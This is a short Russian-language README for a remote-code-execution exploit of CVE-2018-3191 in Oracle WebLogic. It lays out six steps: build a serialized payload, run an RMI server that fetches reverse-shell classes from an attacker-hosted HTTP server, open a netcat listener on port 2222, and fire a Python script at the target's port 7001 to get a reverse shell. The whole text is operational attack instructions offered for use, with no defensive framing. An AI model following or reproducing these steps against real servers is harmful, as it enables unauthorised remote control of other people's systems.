CVE-2018-3191-Rce-Exploit
Автор: Break
Шаг 1: java -jar GenPayload.java output SJpayload.bin, Адрес - это адрес RMI-сервера
Шаг 2: java -jar RMISERVER.jar httpaddress, RMI-сервер прослушивает порт 1099 и загружает удаленные Reverse классы с веб-сервера
Шаг 3: поместите два файла (обратная оболочка) LoadObject.class и StreamConnection.class на HTTP-сервер, чтобы они были доступны по URL
Шаг 4: nc -llp 2222
Шаг 5: python weblogic.py weblogicAddress 7001 SJpayload
Шаг 6: ожидайте обратную оболочку, удачи